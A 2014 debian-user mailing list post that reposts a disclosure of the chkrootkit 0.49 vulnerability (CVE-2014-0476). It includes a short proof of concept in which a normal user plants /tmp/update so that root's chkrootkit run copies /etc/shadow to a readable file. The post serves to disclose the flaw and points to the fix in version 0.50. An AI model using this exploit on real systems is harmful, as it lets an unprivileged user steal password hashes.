Guess that is the matter:
https://www.debian.org/security/2014/dsa-2945
--hh

Just reposting:


Date: Thu, 05 Jun 2014 06:27:35 +0000
From: "mancha" <manc...@hush.com>
To: slackbuilds-us...@slackbuilds.org
Subject: [Slackbuilds-users] chkrootkit vulnerability


Hi.

As ironic as it sounds, chkrootkit 0.49 can be turned into a 
rootkit.

On systems where /tmp is not mounted noexec, a regular user can 
create a file /tmp/update which chkrootkit will execute with root
privileges each time it's run.

Here's a simple PoC...as normal user: 

$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update

As root:

# chkrootkit

Now the user has access to the shadow password file (/tmp/stolen).

Solution: Update to chkrootkit 0.50

--mancha

-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF  ADD1 2516 8EB2 4F0B 22AC]




Horatio Leragon <hlera...@yahoo.com> wrote (Wed, 4 Jun 2014 04:38:45
-0700 (PDT)):
> I received a security update advisory [SECURITY] [DSA 2945-1] today.
> 
> Package        : chkrootkit
> CVE ID         : CVE-2014-0476
> 
> I am shocked to learn that Debian is vulnerable to rootkits. That's
> why there's a package to check for them.
> 
> I switched to Debian from Microsoft Windows OS because of the massive
> over-hype that I read on the internet: that Debian is impervious to
> malware and no viruses have ever infected a *nix OS.
> 
> 
> Should I install this package called "chkrootkit"?
> 
> But then it itself is vulnerable to errors in its code :(


--
To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140605200357.29dcf...@bivalve.fritz.box

Reply via email to